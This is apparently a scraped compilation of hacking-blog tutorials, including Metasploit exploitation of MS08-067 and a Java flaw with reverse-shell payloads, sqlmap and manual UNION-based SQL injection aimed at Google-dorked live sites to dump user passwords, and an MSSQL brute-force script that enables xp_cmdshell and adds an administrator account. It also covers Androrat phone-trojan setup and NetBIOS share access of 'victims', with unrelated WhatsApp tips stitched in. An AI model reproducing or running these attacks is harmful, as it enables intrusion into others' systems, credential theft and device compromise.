[Metasploit Tutorial] Hacking Windows XP using IP Address

Do you think it is possible to hack some one computer with just an ip address?! The answer is yes, if you are using unpatched(vulnerable) OS.  If you don’t believe me, then read the full article.

In this article i am going to demonstrate how to hack a remote computer by exploiting the  parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service(CVE-2008-4250). Before we jump into the actual exploitation process, let me give more details about this Server Service Vulnerability.

Details about Server Service Vulnerability(MS08-067):
Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.

The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The ‘NetprPathCanonicalize()’ function in the ‘netapi32.dll’ file is affected.

A malicious request to vulnerable system results in complete compromise of vulnerable computers.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.

Exploiting the MS08-067 using Metasploit:

Requirements:

• VirtualBox
• Backtrack 5
• Target OS(XP)

Step 1:

Create Two Virtual Machine(VM) namely “Target” and “BT5”.  Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.

If you don’t know how to create virtual machines , then please read this VirtualBox Manual.

Step 2: Find the IP address of Target
Open The command prompt in the Target machine(XP). Type “ipconfig” to find the IP address of the Target system.

Hackers use different method for finding the ip address of victim.  For Eg., By sending link that will get the ip  details or use Angry IP Scanner.

Step 3: Information Gathering
Now let us collect some information about the Target machine.  For this purpose , we are going to use the nmap tool.

Open The Terminal in the BT5 machine(Backtrack) and type “nmap -O 192.168.56.12“.  Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open 

ports and OS version.

Step 4: Metasploit
Now open the Terminal in the BT5 machine(Backtrack) and Type “msfconsole“.

The msfconsole is the most popular interface to the Metasploit Framework. It provides an “all-in-one” centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Let us use the Search command to find the exploit modules with the keyword netapi. Type “search netapi”.  Now you can see the list of modules match with the netapi.

We are going to exploit MS08-067 , so type “use exploit/windows/smb/ms08_067_netapi“.

Step 5: Set Payload
As usual, let use the Reverse Tcp Payload for this exploit also. Type “set payload windows/meterpreter/reverse_tcp” in the msfconsole.

Step 6: Options
Type “set LHOST 192.168.56.10“.  Here 192.168.56.10 is IP address of Backtrack machine.  You can find the ip address by typing ‘ifconfig’ command in the Terminal.

Type “set RHOST 192.168.56.12“.  Here 192.168.56.12 is IP address of Target machine.

Step 7: Exploiting
Ok, it is time to exploit the vulnerability, type “exploit” in the console. If the exploit is successful, you can see the following result.

Now we can control the remote computer using the meterpreter. For example, typing “screenshot” will grab the screenshot of the victim system.

Hacking Remote Pc by Exploiting Java Applet Field Bytecode Verifier Cache Remote Code Execution

CVE-2012-1723: This is a vulnerability in the HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checking. A specially-crafted class file could possibly use this flaw to bypass Java sandbox restrictions, and load additional classes in order to perform malicious operations. The vulnerability was made public by Michael ‘mihi’ Schierl.

Requirement:

• Attacker Machine: Backtrack
• Victim Machine: Windows (install JRE un-patched version  )

Step1: Launch the Metasploit console
Open the Terminal in the Attacker Machine(Backtrack).
Type “msfupdate” , this will update the metasploit with latest modules.
Now type “msfconsole” to get interaction with the Metasploit framework.

Step 2:
Type “use exploit/multi/browser/java_verifier_field_access” and follow the below commands:

msf exploit(java_verifier_field_access) > set PAYLOAD java/meterpreter/reverse_http
msf exploit(java_verifier_field_access) > set LHOST [Backtrack IP ADDRESS]
msf exploit(java_verifier_field_access) > exploit

If you don’t know what i am talking about , please read my previous tutorial.

Step 3:
If you follow the above commands correctly, you will get the following result.

CRACKING HASH PASSWORDS.

What is Brute Force attack?
Brute force attack is one of the password cracking method. In this method we are not decrypting the passwords. Instead we are trying to crack the password by comparing different combination of characters (all possible keys) with hash code.
How ?
Let us assume the password length is 3. we have characters set(abcdefghijklmnopqrstuvwxyz0123456789) excluding the special characters.
The Number of Permutation takes to crack the password:
For first character :upper case letters(26 )+Lower Case Letters(26)+10 Numbers =62
Likewise for second and third character we have 62 different ways.
So the total permutation to produce different keys is =62*62*62=238328 ways.
If you include the special characters in character set,then the permutation to crack the password will increase.
The main problem with Brute force attack :
If the password length is small,then it will be cracked in small amount of time. This method will take too longer time to crack lengthy passwords. It can take several hours, days ,months ,years.
The time depending upon the two factors :
Password Length
Upper case and lower case letter combinations.
Conclusion:
For Hackers:
Hope you understand about brute force attack,also the drawback of this method. You can take advantage if the password is simple and small in length.
For Security needers
If you really want to secure your account from hackers, then use the Strong password. Don’t know how to create the strong passwords

BATCH FILE PASSWORD CRACKER

Hello, Here is another batch file which can crack password of Rar File. You can easily use it to crack any rar file password.
Let’s Start.
Step 1: Open Notepad
Open your Notepad [Start >> Run >> Type ”Notepad” >> Enter]
Step 2: Create Batch File
Copy The Following code in notepad.
REM ============================================================
REM errorcode401.blogspot.in
@echo off
title Rar Password Cracker
mode con: cols=47 lines=20
copy “C:\Program Files\WinRAR\Unrar.exe”
SET PSWD=0
SET DEST=%TEMP%\%RANDOM%
MD %DEST%
:RAR
cls
echo ———————————————-
echo GET DETAIL
echo ———————————————-
echo.
SET/P “NAME=Enter File Name : ”
IF “%NAME%”==”” goto NERROR
goto GPATH
:NERROR
echo ———————————————-
echo ERROR
echo ———————————————-
echo Sorry you can’t leave it blank.
pause
goto RAR
:GPATH
SET/P “PATH=Enter Full Path : ”
IF “%PATH%”==”” goto PERROR
goto NEXT
:PERROR
echo ———————————————-
echo ERROR
echo ———————————————-
echo Sorry you can’t leave it blank.
pause
goto RAR
:NEXT
IF EXIST “%PATH%\%NAME%” GOTO START
goto PATH
:PATH
cls
echo ———————————————-
echo ERROR
echo ———————————————-
echo Opppss File does not Exist..
pause
goto RAR
:START
SET /A PSWD=%PSWD%+1
echo 0 1 0 1 1 1 0 0 1 0 0 1 1 0 0 1 0 1 0 0 1 0 1
echo 1 0 1 0 0 1 0 1 1 1 1 0 0 1 0 0 1 1 1 1 0 0 0
echo 1 1 1 1 1 0 1 1 0 0 0 1 1 0 1 0 1 0 0 0 1 1 1
echo 0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 1 0 0 0 0 0
echo 1 0 1 0 1 1 1 0 0 1 0 1 0 1 0 0 0 0 1 0 1 0 0
echo 1 1 1 1 1 0 1 1 0 0 0 1 1 0 1 0 1 0 1 1 1 1 0
echo 0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 0 0 0 1 1 0
echo 1 0 1 0 1 1 1 0 0 1 0 1 0 1 0 0 0 0 1 1 1 1 0
echo 0 1 0 1 1 1 0 0 1 0 0 1 1 0 0 1 0 1 0 0 1 1 0
echo 1 0 1 0 0 1 0 1 1 1 1 0 0 1 0 0 1 0 1 0 1 0 0
echo 0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 1 1 0 1 0 1
echo 1 0 1 0 1 1 1 0 0 1 0 1 0 1 0 0 0 0 1 0 1 0 0
echo 0 1 0 1 1 1 0 0 1 0 0 1 1 0 0 1 0 1 0 0 1 1 0
echo 1 0 1 0 0 1 0 1 1 1 1 0 0 1 0 0 1 1 0 1 0 0 1
echo 1 1 1 1 1 0 1 1 0 0 0 1 1 0 1 0 1 0 1 1 1 0 0
echo 0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 1 1 1 0 1 1
echo 1 0 1 0 1 1 1 0 0 1 0 1 0 1 0 0 0 0 0 0 1 1 0
echo 1 0 1 0 0 1 0 1 1 1 1 0 0 1 0 0 1 0 1 0 1 0 0
echo 0 1 0 1 1 1 0 0 1 0 0 1 1 0 0 1 0 1 1 1 0 1 1
echo 1 0 1 0 0 1 0 1 1 1 1 0 0 1 0 0 1 0 0 1 1 0 1
echo 1 1 1 1 1 0 1 1 0 0 0 1 1 0 1 0 1 0 1 1 0 1 1
echo 0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 1 1 0 1 1 0
echo 1 1 1 1 1 0 1 1 0 0 0 1 1 0 1 0 1 0 1 1 0 0 0
echo 0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 0 0 1 1 0 1
echo 1 0 1 0 1 1 1 0 0 1 0 1 0 1 0 0 0 0 0 1 0 1 1


UNRAR E -INUL -P%PSWD% “%PATH%\%NAME%” “%DEST%”
IF /I %ERRORLEVEL% EQU 0 GOTO FINISH
GOTO START
:FINISH
RD %DEST% /Q /S
Del “Unrar.exe”
cls
echo ———————————————-
echo CRACKED
echo ———————————————-
echo.
echo PASSWORD FOUND!
echo FILE = %NAME%
echo CRACKED PASSWORD = %PSWD%
pause>NUL
exit
REM ============================================================
Step 3: Save it
Save it with .bat extension[ e.g “RarPSWDCracker.bat”]
Step 4: Run
Now Run it and Enter your File name and path then Hit Enter.
Step 5: Wait
Wait for some time until It crack the Password.
Step 6: cracked
That’s Done..!!
your password has been successfully cracked. now you can open your Rar file using this password.
[Note : It can only crack Numeric Password]

Database Hacking, Part 3: Using sqlmap for SQL Injection Against MySQL and WordPress

 

 There are many SQL injection tools, but probably the most popular is sqlmap. In this tutorial, we will use sqlmap to compromise a MySQL database behind a website.  

Generally, MySQL is teamed up with PHP and an Apache web-server (often referred to as LAMPP or XAMPP) to build dynamic, database-driven web sites. Such content management and development packages as Drupal, Joomla, Wordpress, Ruby on Rails and others use MySQL as their default backend database. Millions of websites have MySQL backends and very often they are "homegrown" websites, without much attention to security.

In this tutorial, we will looking to extract information about an online MySQL database before we actually extract information from the database. Once again, I'll repeat, the more we know, the more successful we will be in hacking and the less chance you will be detected.

Sqlmap can be used for databases other than MySQL, such Microsoft's SQL Server and Oracle, but here we will focus its capabilities on those ubiquitous web sites that are built with PHP, Apache and MySQL such as WordPress, Joomla and Drupal.

 

 

Step #1 Start sqlmap

 

First, fire up Kali and go to Applications -> Database Assessment ->sqlmap, as shown in the screenshot below.

Step #2 Find a Vulnerable Web Site

 

In order to get "inside" the web site and, ultimately the database, we are looking for web sites that end in "php?id=xxx" where xxx represents some number. Those who are familiar with google hacks/dorks can do a search on google by entering:

• inurl:index.php?id=
• inurl:gallery.php?id=
• inurl:post.php?id=
• inurl:article?id=

...among many others.

These dorks will bring up literally millions of web sites with this basic vulnerability criteria. If you are creative and ambitious, you can find numerous web sites that list vulnerable web sites. You might want to check these out.

For our purposes here and to keep you out of the long reach of the law, we will be hacking a website designed for this purpose, www.webscantest.com. We can practice on this web site and refine your skills without worrying about breaking any laws and having to make bail money for you.

Step #3 Open sqlmap

 

When you click on sqlmap, you will be greeted by a screen like that below.

This first help screen shows you some basics of using sqlmap, but there are multiple screens showing even more options. For brevity, I have excluded them, but we will return to some of these other options and capabilities in future sqlmap tutorials.

Sqlmap is a powerful tool, written as a Python script (we will be doing Python tutorial soon) that has a multitude of options. We will just be scratching the surface of its capabilities in this tutorial.

Step #4 Determine the DBMS Behind the Web Site

 

Before we begin hacking a web site, we need to gather information. We need to know WHAT we are hacking. As I have said many times before, most exploits are very specific to the OS, the application, services, ports, etc. Let's begin by finding out what the DBMS is behind this web site.

The start sqlmap on this task, we type:

kali> sqlmap -u "the entire URL of the vulnerable web page"

or this case:

kali>  sqlmap -u "http://www.webscantest.com/datastore/ search_get_by_id.php?id=4"

Note that the entire URL is enclosed in double quotation marks (").

When we do so, sqlmap will return results like that below. Notice where I highlighted that the web site backend is using MySQL 5.0

Step #5 Find the Databases

 

Now that we know what the database management system (DBMS) is MySQL 5.0, we need to know what databases it contains. sqlmap can help us do that. We take the command we used above and append it with --dbs, like this:

kali >  sqlmap -u "http://www.webscantest.com/datastore/

search_get_by_id.php?id=4" --dbs

When we run this command against www.webscantest.com we get the results like those below.

Notice that I have circled  the two available databases, information schema and webscantest. Information schema is included in every MySQL installation and it includes information on all the objects in the MySQL instance, but not data of interest. Although it can be beneficial to explore that database to find objects in all the databases in the instance, we will focus our attention on the other database here, webscantest, that may have some valuable information. Let's explore it further.

Step #6 Get More Info from the Database

 

So, now we know what the DBMS is (MySQL 5.0) and the name of a database of interest (webscantest). The next step is to try to determine the tables and columns in that database. In this way, we will have some idea what data is in the database, where it is and what type of data it contains (numeric or string). All of this information is critical and necessary to extracting the data. To do this, we need to make some small revisions to our sqlmap command.

Everything else we have used above remains the same, but now we tell sqlmap we want to see the tables and columns from the webscantest database. We can append our command with --columns -D and the name of the database, webscantest such as this:

kali > sqlmap -u "http://www.webscantest.com/datastore/

search_get_by_id.php?id=4" --dbs --columns -D webscantest

When we do so, sqlmap will target the webscantest database and attempt to enumerate the tables and columns in this database.

As we can see below, sqlmap successfully was able to enumerate three tables; (1) accounts, (2) inventory, and (3) orders, complete with column names and datatypes. Not Bad!

Note that the orders table above includes credit card numbers, expiration dates and CVV. In future tutorials, I'll show you how to extract that information, the hacker's "Golden Fleece"!!

Step #7 Advanced and Modern sqlmap Attack Against WordPress Sites

Now that we know the basics of sqlmap, let's look at a more advanced use of this wonderful tool. Recently (December 28, 2016), a security researcher (Tad Group) found a vulnerability to  an advanced SQL injection attack  against WordPress websites that include the plug-in Simply Polls (https://wordpress.org/plugins/simply-polls/) . Since this attack was just recently released and the publisher has not yet issued a patch, most of these sites are vulnerable.

To find WordPress websites, see my tutorial on Finding Vulnerable Wordpress Websites.

The sqlmap command to exploit those WordPress sites with Simply Polls plug-in is:

sqlmap -u "http://example.com/wp-admin/admin-ajax.php"

--data="action=spAjaxResults&pollid=2" --dump -T wp_users -D wordpress --threads=10 --random-agent --dbms=mysql --level=5 --risk=3

Of course, replace "example.com" with the URL of the vulnerable website.

Conclusion

As you can see, sqlmap can be very versatile and useful tool for MySQL, as well as MS SQL Server and Oracle database hacking. We will plan on coming back to sqlmap in the near future to explore more of its extensive database hacking capabilities. If you are interested in extracting the data from that database, read my next article in this series, Database Hacking, Part 4: Extracting Data from the Database

Keep coming back, my amateur hackers, for more adventures in Hackers-Arise.

hacking websites using SQL injection attack on vulnerable sites

hacking websites using SQL injection attack on vulnerable sites.
Warning : This is only for EDUCATIONAL purposes to make you aware of the vulnerabilities that may be present in your website so that you may self test it in your OWNED website to IMPROVE the SECURITY ,,,,,!!! The person posting this or the this blog is not responsible for any type malicuous activities performed by anyone else,,,,!!!
This is what they basically teach you when you go for certain HACKING COURSES which I have taken pains for hours to put this to you without even earning a penny and sharing it for FREE,,,,!!! Atleast some comments and feedback from you will make me Happy ^_^
So Guyzzz I have now decided to post some serious ADVANCED LEVEL OF Hacking stuffs which is how the “Cracker” breaks into your Vulnerable Websites,,,,!!!
All you need to know is a bit of SQL queries,,,!!!
It doesnt matter even if you are not an expert in
So here we go,,,
What is SQL Injection?
So let me give you some idea of what I am going to talk about,,,,There are many complex defenitions you may get in various other sites,,, But I put it in simple terms,,,, You type some SQL queries or codes [or whatever you wish to call it ;D] on the address bar[whee you type the web address of sites to be searched] to test vulnerable website,,,,!!! If you find it vulnerable then BINGO,,,!!! we will use some more SQL injection queries to crack it,,,!!!
So guyzzz who are related to computer science stream,,, If you found learning SQL boring this is one way to make yourself interested in ;D
And as far as others are concerned,,, please dont worry i’will be giving you some codes which you may use to Test the Vulnerability of the site,,,!!!
QUICK STEPS TO FIND THE VULNERABILITY OF WEBSITES,,,!!!
Step 1:
Search for any of the following terms in Google:
inurl:product.php?id=
inurl:index.php?id=
inurl:news.php?id=
inurl:shop.php?id=
inurl:shop.php?pid=
inurl:newsroom.php?id=
Step 2: Now for example say there is a website that you found in Google search say for example
http://www.rahulswebsite.com/index.php?id=7
Open the website in a new tab,,,!!!
Step 3:
To test if your selected website is vulnerable:
Add the ‘ (single quote symbol) after the site as follows
http://www.rahulswebsite.com/index.php?id=7&#8242 ;
and now Hit the “Enter” Key,,,!!!
If there is any type of “ MySQL error ” !!!BINGO,,,!!!
Then it means your target website is vulnerable.
STEPS TO HACK INTO THE WEBSITE AFTER FINDING THE VULNERABILITY
Step 1:
After finding the vulnerability of your target site, use the ORDER BY command to extract the number of columns in the database.
Ex Code:
http://www.anywebsite.com/index.php?id=7 ORDER BY 1–
Doing ORDER BY 1– should always return the original page with NO error.
Step 2:
Then do ORDER BY 2–
If this shows the original page with NO error, continue.
Now try ORDER BY 3–
and so on,
If this shows the original page with NO error, continue.
Step 4:
Continue increasing the ORDER BY number until you reach an error. For example, if doing ORDER BY 10– returns an error, then there is a table which has NINE (9) columns, NOT 10. Always subtract ONE from the number that produced the error.
STEP 5:
Next step is to use UNION & SELECT
After getting the number of columns, let’s say we have NINE columns. Then you have to type the following code:
Code:
http://www.anywebsite.com/index.php?id=7 UNION ALL SELECT 1,2,3,4,5,6,7,8,9–
You should see a page with a few numbers scattered throughout it. If so, continue,
IF NOT, try the following in which we have to add the ” – “hypen or negative sign in front of the id value of our website:
Code:
http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,2,3,4,5,6,7,8,9–
At the end if this produces the scattered numbers, continue, if not, STOP!!!
Choose anyother target website from the GOOGLE search and repeat the vulnerability test,,,!!!
Step 6:
Now we use the database() command
After you see the scattered numbers, pick one to exploit. Say the numbers on my page are TWO and SEVEN. I will choose the number TWO. After choosing your number, put database() in place of it in your URL as shown below. REMEMBER, I chose number TWO.
Code:
http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,database(),3,4,5,6,7,8,9–
That should return some text in place of the scattered TWO. WRITE THIS TEXT DOWN, and move on.
Step 7: We use group_concat
This is where everything gets a little trickier! This is also the part where you will be extracting data. Yeah! Bingoo!!! :D :D *** Fist punch ***
After extracting the name of the database using database(), type this where you typed database() in the previous step.
Code:
http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()–
TYPE THIS EXACTLY AS IT IS SHOWN, and press enter.
In place of the scattered TWO, you should see a LOT of text separated by commas. These are called tables. The text varies by website, but you usually want to look for things like “admin,” “staff,” or “users.” Choose the one that interests you. For this tutorial, I will choose “users.” Now type this:
Code:
http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database()–
OR
if you want the columns from ONLY one table, use this (courtesy of dR..EviL):
Code:
http://www.anywebsite.com/index.php?id=-7UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_name=< table name goes here in hex or ascii format >–
This should return even more text. These are called columns. Again choose what interests you, but for this tutorial, I will choose “username” and “password.”
The columns “username” and “password” contain the data we want to extract. To extract the final data, meaning, in this case, the usernames and passwords of all the users, type this:
Code:
http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,group_concat(username,0x3a,password,0x3a),3,4,5,6,7,8,9 from users–
Where it says “username,0x3a,password,0x3a” is where you would the name of your chosen COLUMNS, such as username and password, DO NOT replace the 0x3a, ONLY the username and password area. Where it says “from users–,” replace “users” with the name of your chosen table such as the one “users.” All of this will produce even MORE text in this format:
Code:
admin:thisismypass:,
The comma separates each set of data.

Whatsapp Tips and Tricks that you didn’t Know!

When downloading and using new applications on new smartphones, there is always something new that you could learn every day. The story is the same with new Whatsapp users. Whatsapp has more than a billion users, with thousands of downloads every day. It’s easy to download and extremely easily to use, but the app comes with some hidden tricks and functions, which cannot be figured out during first use. These hidden features can be activated quite easily, but a user needs to know about the basic functions and features of Whatsapp first to activate these.
This guide is simply to make the entire process a whole lot easier for you. Here, we have listed some of the finest tricks and hidden features of Whatsapp that you can activate. But first, we will look at a few details regarding the app itself. So read on to find out more.
Whatsapp and How it Works
This wonderful app is the perfect little IM app available for almost all smartphone platforms. Once privately owned, the app was purchased by
Mark Zuckerburg two years ago. Using this app, users can send images, audio messages, text messages, videos, and even call a friend using Wi Fi connectivity. This app has been named the most popular IM app in the entire world for 4 years in a row, and is very much justifiable, with wonderful features and over a billion users. The Whatsapp servers handle almost 250 million videos and more than 42 billion text messages almost every day.
We will now look at a few tips and tricks that you can unlock while you use Whatsapp. Read on to find out more.

Top 6 Whatsapp Tips and Tricks
Whatsapp comes with several hidden features which you should definitely try a hand at. Starting from simple things like deleting texts, to avoid blue ticks to keep your online status hidden, there are many tricks that you can read about that will surely make your Whatsapp usage much more meaningful. Given below are a few of these tricks:
1. Secure chats with passcode option
Whatsapp itself has no passcode feature, but if you download highly reviewed Android third party apps, you can easily secure all your chats with a PIN or password, so that no one else can read it. Apps like Smart AppLock, AppLock, Chat Block, etc, are perfect for an Android device. Apps like Whatsapp Locker and Lock for Whatsapp Messenger are perfect for Windows and Blackberry devices respectively.

2. Whatsapp on Web
Whatsapp for Web – Desktop and laptop users can breathe a bit easy now. All smartphone users can now use their favorite IM app right from the comfort of their workstation or home PCs. You just need Google Chrome on your computer, open the Whatsapp on Web homepage, scan a particular QR code with the scanner on your app, and follow each and every instruction given after that.
All your chats and notifications will be provided on your desktop, using which, you can reply to each and every text you receive. Your phone needs to have an active data connection for the Whatsapp on Web feature to work, because without connection, the app and the web will be out of sync.

3. Keep read receipts and timestamps hidden
Your Whatsapp contact list comes with many features, such as the LAST SEEN feature under the user’s name. This indicates the time when the user was last online. But if you, as a user, want to hide this information from anyone snooping around, you just need to go to Settings > Account > Privacy , and choose the privacy option you selected. Also, when someone sends you a text and you read it, that particular user can see a blue tick beside the message, stating that you have read the message. If you do not want to disclose whether or not you have read the message, simply go to Settings > Account > Privacy, and untick the box with the label READ RECEIPTS. These two options will surely maintain your privacy from stalkers.

4. Archiving all memorable and important chats
Some of the chats on your Whatsapp may be extremely memorable, or important for the kind of work you do. Sometimes chats might get deleted accidentally, and simply cannot be recovered. In such a case, archiving your chats is a much better idea. You can take a backup of all your chats on your SD Card or in your synched Google Drive so that they can be recovered or read when you need them. The option to archive all chats can be found in the settings menu of Whatsapp.

5. Determining the read time of your sent message
When you send a message to a certain user, check marks appear beside the message. A single check means the message is sent, a double grey check means the message has been delivered, and a double blue check means the message has been read. Now do you want to find out when your message was read and delivered? The process is quite simple. Long press the message till it is highlighted. Press the “i” button that appears on the top right corner after the message is highlighted, which will tell you the time of delivery and the time it was read.
Whatsapp does not showcase any advertisements, and has recently been declared as free for life. Earlier, a user had to pay a nominal subscription free after one year of free usage. But this new lifetime free usership has given rise to the number of users in the last one year. Any user can download the app from the Google Playstore for Android, iTunes store for Apple devices, OVI Store for Windows mobiles, and now it is also available on Blackberry smartphones as well. After downloading the app and installing it, you need to enter your mobile number for registration. You need to enter your real number because your contacts will be synchronized with your chat list on Whatsapp so that you can chat with your friends effectively.

The USB Stick That Can Kill Someones PC – USB Killer v2.0 KALIXTO

USB Killer v2.0 – The Next Level of Computer Destruction Has Arrived!

If you are familiar with the chaos caused by Killer USB , you would probably be shocked to know that an even powerful version of the previous damage-maker has been released.
Not too long back (in March to be precise), a Russian security researcher came up with something that become popular over the Internet as the Killer USB. It was a weird USB stick capable of destroying the sensitive components of a PC when plugged-in.
However, now the same person, popularly known by his nickname Dark Purple, has come up with something that’s an even bigger trouble to worry about, the advanced version of the Killer USB, which is the USB Killer v2.0. The latter is believed to be way more powerful even than the former, and seemingly, it’s capable of causing more destruction than just damaging the sensitive components of a computer.
How powerful this version is?
Well, let us first take a detailed look at what the first version, the Killer USB was capable of in order to understand exactly how it’s latest version can be way more powerful and destructive.
The Killer USB would consist of a DC/DC converter, an FET as well as a few caps . This device, which would almost look as normal as the genuine USB devices out there, would end up charging the caps up to -110V immediately on plugging in. This would lead to the same voltage being applied to signal lines of the USB interface. Finally, this process would keep repeating until everything you can imagine a computer to contain is rendered in a perfectly useless and worthless state.
Now let us understand why exactly the latest version of this already terrible USB stick, the USB Killer v2.0, is being believed to be even more dangerous. Well, simply put, it’s because of the fact that it would charge the caps up to -220V, clearly the double that of its previous version. What this would result in is damage any computer you can imagine of that has a USB port.
Another terrible thing about this so called latest version of the super trouble-maker Killer USB is that it’s surprisingly fast too. To be precise, all it would take is a few seconds for the USB Killer v2.0 to result in your PC getting shut down and stop working when plugged-in.
Well, honestly speaking, this guy who developed these terrible USB sticks seems a bit crazy to say the least. What makes us say that? Well, he himself demonstrated how the latest version of his Killer USB works, and to do so, he ended up destroying his brand new Lenovo Thinkpad X60 laptop . He has even posted the video to YouTube (you can play the video below). Basically this is the best method on how to destroy someones PC using a USB Stick/Flashdrive.
Furthermore, he even mentioned to the people watching his video that they need not worry about the laptop, as a new motherboard was on the way to replace the destroyed one. However, he also says that he didn’t actually plan to do that initially, as the laptop was just supposed to be used for test purpose only.
Not a New concept?
You will probably be surprised to know that devices such as this Killer USB and its latest version, the USB Killer v2.0, are not at all a new concept. USB drives are being used from quite a long time now to attack the components of systems in air-gapped networks.
As an example, let us mention that there’s also something known as Stuxnet worm . It actually started as a USB drive, and is aimed at destroying centrifuges at the Nuclear facility. Well, that makes us conclude that hackers can even turn your computer into a bomb if they want to, and make it explode as well.

Easiest way to Crack bios password

Forgot BIOSPassword ?
Do the following :
1. Open the CPU
2. Now, observe the motherboard.
3. You notice a coin like silverBattery(3V).
—————————————– NOTE ——————————————————–
This battery is 24 x 7 power supply for the BIOS, which is used to run the system clock will the main power is off. It also initiates the booting process when power is switched on.
———————————————————————————————————–
4. Remove the battery from the motherboard.
(It is safe to remove the Battery)
5. Wait 30 seconds and place the battery back on the motherboard.
6. Now, when you start your system you won’t be prompted for the BIOS password.
Enjoy !!!
———————————— CAUTION ———————————————–
1. Perform on your own risk !
2. You have to set the time of your computer when you start again.

SQL BRUTFORCE ATTACH SCTIPT

#!/usr/bin/python
import _mssql
# mssql = _mssql.connect('ip', 'username', 'password')
# mssql.execute_query()
passwords = file("pass.txt", "r")
ip = "192.168.200.128"
for password in passwords:
password = password.rstrip()
try:
mssql = _mssql.connect(ip, "sa", password)
print "[*] Successful login with username 'sa' and password: " + password
print "[*] Enabling 'xp_cmdshell'"
mssql.execute_query("EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell', 1;RECONFIGURE;")
mssql.execute_query("RECONFIGURE;")
print "[*] Adding Administrative user"
mssql.execute_query("xp_cmdshell 'net user netbiosX Password! /ADD && net localgroup administrators netbiosX /ADD'")
mssql.close()
print "[*] Success!"
break
except:
print "[!] Failed login for username 'sa' and password: " + password
The purpose of this script is to perform a brute force attack on an SQL database.The script will try to connect to the remote host with the administrative account sa and with one password that will be valid from the file pass.txt.If the connection is successful then it will try to enable the xp_cmdshell and add a new user on the remote host.
NEXT SQL brute force attack script

Trick to Bypass Timer Restriction in Cyber Café

So the Process Explorer is that application that Suspend few running applications and can resume it instantly if you want too, so we will be
Using it to do d job

1. After you have downloaded the process explorer.
2. Open it up on the cyber café system you are using.
3. Now you need to search for two running processes “Client.exe ” and “Guardit.exe ”, as these two are responsible for running that timer.
4. Now just right on both of them and choose Suspend.
5. This terminates the process and hence your timer will be stopped, and you can browse internet without restriction.
6. After some good time surfing, if you wanna re-enable the timer, you can simply right click once again and choose Resume to start those process again, hence your timer will be started again.

I hope you enjoyed this tutorial ;)

How To Hack Android Phones With Androrat

In this post i am going to show you how to hack Android phones withAndrorat. In our tutorials we only EVER hack our own systems as a proof of concept and never engage in any black hat activity.
Step1: Create an account on noip.com.
Step2: Create a host on noip.com and enter
Hostname and click Add Host
Step3: Now do port forwarding on your network. Port forwarding settings changes on each moderm, so google your moderm and find out how to do port forwarding
Step4: Download Androrat Binder and enter the
Hostname and Port. Name the file and click Go. If you want to inject this file with another .apk file then go to Build + Bind tab name apk title and browse the location of the .apk and click Go.
Step5: Now download DUC (Dynamic DNS Update Client for Windows) and install
Step6: Open DUC and enter the host details which you have created in noip.com
Step7: Download and run Androrat Project. Open
Server tab on top and enter the port which you use on noip.com
Step8: Now run the .apk which is created by
Androrat Binder on a Android Mobile.

Hack some other computer remotely using their IP address

Step 1:
Now Go to Star and click Run and then type as “CMD” and hit enter.
command prompt will open.
Step 2:
Type in cmd as “ nbtstat -a IPaddressOfVictim”
and hit enter.
(use ping command to know victim ipaddress)
For eg:
nbstat -a 223.222.222.222
If you see this your in NetBIOS Remote Machine Name Table
Name Type Status
—————————————————————
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = xx-xx-xx-xx-xx-xx
—————————————————————
If you don’t get the number <20>.
The victim disabled the File And Printer Sharing, find another victim.
Step 4:
Now type as “net use x: \IPaddressOfVictimCDISK” and hit enter>
replace with ip address of vitim in the place of “IPaddressOfVictim.
You can give any letter instead of ‘x’.
For eg:
net use x:\223.222.222.222CDISK
Step 5:
Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive
Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:.
This hack will only work if you have the ip of someone on your network. It will not work if the ip of the person you want to “hack” is not on your network.
If you can only access your targets shared folder put a batch file in their shared folder with the command C=C if they open it,it will share their hard drive..

CYBER SECURITY

Hackers, viruses, worms, ransomware and spyware are only a few things that can do harm to your computer, network and in some cases your wallet. It can be scary to know how easily your identity can be stolen, simply by clicking a malicious link from an email. Although there are numerous ways in which a computer user can be attacked or exploited, there are also many ways you can protect yourself and your company from cyber threats.

Below is a list of ten cyber security basics to protect your computer network from viruses and cyber-attacks.

